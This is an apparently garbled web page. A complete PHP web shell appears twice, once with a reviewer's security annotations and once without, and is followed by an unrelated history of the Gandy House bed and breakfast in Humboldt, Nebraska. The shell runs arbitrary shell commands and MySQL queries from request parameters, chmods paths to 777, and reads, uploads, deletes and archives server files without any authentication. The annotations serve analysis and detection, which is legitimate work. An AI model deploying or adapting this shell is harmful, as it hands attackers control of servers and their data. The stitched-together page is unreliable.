$val)/* REVIEW: tail of a path-normalising helper; its signature is outside this excerpt (presumably the cleanPath() called further down - confirm against the full file). */ //Process .. directories and a single . { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val)//Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } //Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } /* REVIEW: request dispatcher. Each branch below acts directly on $_REQUEST, $_COOKIE or $_FILES values, and no authentication or input validation is visible in this excerpt. That combination (file read/write/delete, chmod and exec on raw request data) is what a web shell looks like; the parameter names and sinks below are usable as detection signatures. */ /* 'chm': chmod() of a caller-supplied path to 0777; the @ suppresses the warning on failure. */ if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); } } /* 'phpinfo': emits phpinfo() to the requester, disclosing the PHP and server configuration. */ elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } /* 'dl': joins 'dl' and 'file' into a path and streams it with readfile(); the path is not confined to any base directory, 'file' goes unescaped into the Content-disposition header, and on failure 'dl' is echoed back without HTML escaping. */ elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } /* 'gz': the caller-supplied directory is interpolated into the exec() command string with no escapeshellarg(), so this is a shell-command sink as well as a bulk-download path. The archive is named after time(), read back, sent and then unlinked. */ elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory = substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive = time(); exec( "cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . 
$archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . $archive); } } /* 'f': fopen() on a caller-supplied name and fpassthru() of its contents as text/plain; the fopen() result is not checked and the path is unrestricted. */ elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } /* 'd': directory browser built on opendir()/readdir() over a caller-supplied path. */ elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "

";
    if ($handle = opendir("$d")) 
    {
        echo "

listing of "; $conString=""; if($isLinux) echo "$slash"; /* path components are echoed without htmlentities() */ foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)

 (gzip & download folder) (chmod folder to 777) (these rarely work)

"; while ($dir = readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { /* 'hldb': reads each file with file_get_contents() and marks it 'red' when it contains "mysql_", "mysqli_" or "SELECT " - the page's own label for these is "DB interaction files in red". */ if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; //Some configurations throw a notice if is_array is tried with a non-existant variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); } /* 'c': the request value is handed unmodified to exec(), i.e. arbitrary command execution with the privileges of the PHP process. The command string is echoed back unescaped; only the output lines pass through htmlentities(). Listing exec in disable_functions blocks this branch and the 'gz' branch. */ elseif(isset($_REQUEST['c'])) { if( @ini_get('safe_mode') ) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } echo "Command: " . $_REQUEST['c'] . "

"; trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { echo '

' . htmlentities($val) . '

'; } } /* upload: move_uploaded_file() into the directory named by the client-controlled 'uploadDir' cookie; basename() is applied to the file name only and no type or extension check is made. */ elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path = $_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path = $target_path . basename( $_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { setcookie("uploadDir",""); echo "The file ". basename( $_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>

Submit this form before submitting file (will open in new window):
Upload Directory: ">



Upload file:
The following query has sucessfully executed" . htmlentities($mquery) . "


"; echo "Return Results:
"; $first=true; echo "

"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { if($first) { echo ""; foreach($row as $key=>$val) { echo ""; } echo ""; reset($row); $first=false; } echo ""; foreach($row as $val) { echo ""; } echo ""; } echo "
$key
$val

"; mysql_free_result($result); } else { echo "Query Error: " . mysql_error(); } } elseif(isset($_REQUEST['df'])) { $_REQUEST['df'] .= $slash . $_REQUEST['file']; if(@unlink($_REQUEST['df'])) { echo "File deleted"; } else { echo "Error deleting file"; } } elseif(isset($_REQUEST['ef'])) { ?>




Server Information:
Operating System:
Operating System:
PHP Version:
View phpinfo


Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:


Execute MySQL Query:

host
user
password
database
query

Execute Shell Command (safe mode is ):
 
<?php
}
// REVIEW: the text between the upload branch's closing PHP tag and the opening tag above lost its markup when the page was extracted.
// What remains shows a MySQL query runner (mysql_fetch_array() over $result, failures reported via mysql_error()), a 'df' branch
// that unlink()s the path built from 'df' and 'file', and an 'ef' branch whose body is not visible here.
//Intentionally left open to avoid output the file download function 1



$val)//Process .. directories and a single . { if($val=="..") { $parts[$key]=""; $lastKey=$key-1; $parts[$lastKey]=""; } elseif($val==".") { $parts[$key]=""; } } reset($parts); $fixedPath=($isLinux ? "/" : "");//Some PHP configs wont automatically create a variable on .= or will at least whine about it $firstPiece=true; foreach($parts as $val)//Assemble the path back together { if($val != "") { $fixedPath .= ($firstPiece ? '' : $slash) . $val; $firstPiece=false; } } if($fixedPath=="")//If we took out the entire path go to bottom level to avoid an error { $fixedPath=($isLinux ? $slash : ($driveLetter . ":" . $slash)); } //Make sure there is an ending slash if(substr($fixedPath,-1)!=$slash) $fixedPath .= $slash; return $fixedPath; } if(isset($_REQUEST['chm'])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { echo (@chmod ( $_REQUEST['chm'] , 0777 ) ? "Reassigned" : "Can't Reasign"); } } elseif(isset($_REQUEST['phpinfo'])) { phpinfo(); } elseif(isset($_REQUEST['dl'])) { if(@fopen($_REQUEST['dl'] . $_REQUEST['file'],'r')==true) { $_REQUEST['dl'] .= $_REQUEST['file']; if(substr($_REQUEST['dl'],0,1)==$slash) $fileArr=explode($slash,$_REQUEST['dl']); header('Content-disposition: attachment; filename=' . $_REQUEST['file']); header('Content-type: application/octet-stream'); readfile($_REQUEST['dl']); } else { echo $_REQUEST['dl']; } } elseif(isset($_REQUEST["gz"])) { if(!$isLinux) { echo "This feature only works on Linux"; } else { $directory=$_REQUEST["gz"]; if(substr($directory,-1)=="/") $directory = substr($directory,0,-1); $dirParts=explode($slash,$directory); $fname=$dirParts[(sizeof($dirParts)-1)]; $archive = time(); exec( "cd $directory; tar czf $archive *"); $output=@file_get_contents($directory . "/" . 
$archive); if(!$output) header("Content-disposition: attachment; filename=ACCESS_PROBLEM"); else { header("Content-disposition: attachment; filename=$fname.tgz"); echo $output; } header('Content-type: application/octet-stream'); @unlink($directory . "/" . $archive); } } elseif(isset($_REQUEST['f'])) { $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); header("Content-Type: text/plain"); fpassthru($file); } elseif(isset($_REQUEST['d'])) { $d=$_REQUEST['d']; echo "

";
    if ($handle = opendir("$d")) 
    {
        echo "

listing of "; $conString=""; if($isLinux) echo "$slash"; foreach(explode($slash,cleanPath($d,$isLinux)) as $val) { $conString .= $val . $slash; echo "" . $val . "" . ($val != "" ? $slash : ''); } echo " (upload file) (DB interaction files in red)

 (gzip & download folder) (chmod folder to 777) (these rarely work)

"; while ($dir = readdir($handle)) { if (is_dir("$d$slash$dir")) { if($dir != "." && $dir !="..") $dirList[]=$dir; } else { if(isset($_REQUEST["hldb"])) { $contents=file_get_contents("$d$slash$dir"); if (stripos($contents, "mysql_") || stripos($contents, "mysqli_") || stripos($contents, "SELECT ")) { $fileList[]=array('dir'=>$dir,'color'=>'red'); } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } else { $fileList[]=array('dir'=>$dir,'color'=>'black'); } } } echo ".\n"; echo "..\n"; //Some configurations throw a notice if is_array is tried with a non-existant variable if(isset($dirList)) if(is_array($dirList)) foreach($dirList as $dir) { echo "$dir\n"; } if(isset($fileList)) if(is_array($fileList)) foreach($fileList as $dir) { echo "" . $dir['dir'] . "" . "|Download|" . "|Edit|" . "|Delete| \n"; } } else echo "opendir() failed"; closedir($handle); } elseif(isset($_REQUEST['c'])) { if( @ini_get('safe_mode') ) { echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ')
'; } echo "Command: " . $_REQUEST['c'] . "

"; trim(exec($_REQUEST['c'],$return)); foreach($return as $val) { echo '

' . htmlentities($val) . '

'; } } elseif(isset($_REQUEST['uploadForm']) || isset($_FILES["file_name"])) { if(isset($_FILES["file_name"])) { if ($_FILES["file_name"]["error"] > 0) { echo "Error"; } else { $target_path = $_COOKIE["uploadDir"]; if(substr($target_path,-1) != "/") $target_path .= "/"; $target_path = $target_path . basename( $_FILES['file_name']['name']); if(move_uploaded_file($_FILES['file_name']['tmp_name'], $target_path)) { setcookie("uploadDir",""); echo "The file ". basename( $_FILES['file_name']['name']). " has been uploaded"; } else { echo "Error copying file, likely a permission error."; } } } else { ?>

Submit this form before submitting file (will open in new window):
Upload Directory: ">



Upload file:
The following query has sucessfully executed" . htmlentities($mquery) . "


"; echo "Return Results:
"; $first=true; echo "

"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) { if($first) { echo ""; foreach($row as $key=>$val) { echo ""; } echo ""; reset($row); $first=false; } echo ""; foreach($row as $val) { echo ""; } echo ""; } echo "
$key
$val

"; mysql_free_result($result); } else { echo "Query Error: " . mysql_error(); } } elseif(isset($_REQUEST['df'])) { $_REQUEST['df'] .= $slash . $_REQUEST['file']; if(@unlink($_REQUEST['df'])) { echo "File deleted"; } else { echo "Error deleting file"; } } elseif(isset($_REQUEST['ef'])) { ?>




Server Information:
Operating System:
PHP Version:
View phpinfo


Directory Traversal
Go to current working directory
Go to root directory
Go to any directory:


Execute MySQL Query:

host
user
password
database
query

Execute Shell Command (safe mode is ):
 
<?php
}
//Intentionally left open to avoid output the file download function 1



HISTORY

"The Gandy House" began as a wooden store front around Humboldt square and in 1889 was moved to its current site. Dr George and Clementine (Rousek) Gandy built on to the house after they married in 1910. Dr Gandy was born in Humboldt in 1880 and graduated from Humboldt Public Schools. After leaving to obtain his medical degree, he returned to Humboldt in 1904 and set up his medical practice in the Park Hotel on the Square. His father, Dr James L Gandy, was the first physician to locate in Humboldt in 1869. His mother, Mary E (Otto) Gandy, ran a drug store.

The native rock that surrounds the property and is featured on the front porch, sun room and upper deck was gathered from farm fields surrounding Humboldt. It is said that Dr Gandy paid local people fifty cents a day to gather these rocks and bring them to his property. The working wood fireplace in the living room also features the native rock.

Part of the original house was one of the first wooden buildings around the City square. It was relocated to its present location when brick buildings were built.

The original antique lighting fixtures and dark woodwork are featured throughout the house.

The Stalder Family purchased the home from the Estate of Clementine Gandy in 1972. Duaine and Sandy (Schacht) Stalder, innkeepers, purchased the home from the Estate of Harry Stalder in 2008, and it became "Stalder's B & B - The Gandy House", with the motto "It's like staying at Grandpa and Grandma's house".

“The Gandy House” is located just off highway 105 between highways 4 and 8. It is approximately 75 miles south of Lincoln, NE, 90 miles south of Omaha, NE, and 120 miles north of Kansas City, MO.

It is located one block north of Humboldt’s Historic City Square.

You can relax in the large sun room, front porch, by the stone fireplace in the living room, or read a book in the parlor.